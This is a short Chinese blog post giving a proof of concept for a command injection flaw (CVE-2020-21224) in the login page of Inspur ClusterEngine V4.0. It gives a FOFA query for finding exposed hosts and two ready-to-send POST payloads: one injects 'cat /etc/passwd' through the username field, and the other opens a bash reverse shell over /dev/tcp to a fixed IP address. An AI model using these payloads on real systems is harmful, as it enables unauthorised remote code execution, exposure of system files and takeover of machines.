浪潮 ClusterEngineV4.0 集群管理系统命令执行漏洞 (CVE-2020-21224)

棉花糖

7月20日发布

030

# 浪潮 ClusterEngineV4.0 集群管理系统命令执行漏洞 (CVE-2020-21224)

FOFA：

title=”TSCEV4.0″

登录处username存在RCE 可直接构造恶意参数进行命令执行：

“`
POST /login.php

op=login&username=;`cat /etc/passwd`&password=”
shell op=login&username=1 2\’,\’1\’\); `bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.16.11.81%2F80%200%3E%261`
“`

ref：

* https://cxsecurity.com/cveshow/CVE-2020-21224/
* https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

喜欢就支持一下吧

请登录后发表评论

登录注册

请登录后查看评论内容

浪潮 ClusterEngineV4.0 集群管理系统命令执行漏洞 (CVE-2020-21224)

请登录后发表评论

1[投稿]某知识星球付费资源，价值120大洋

2某公众号的纯垃圾SRC知识库（他妈的又被割了）

3老外百万赏金猎人直播课录屏第七课

浪潮 ClusterEngineV4.0 集群管理系统 命令执行漏洞 (CVE-2020-21224)

请登录后发表评论

1[投稿]某知识星球付费资源，价值120大洋

2某公众号的纯垃圾SRC知识库（他妈的又被割了）

3老外百万赏金猎人直播课录屏第七课

浪潮 ClusterEngineV4.0 集群管理系统命令执行漏洞 (CVE-2020-21224)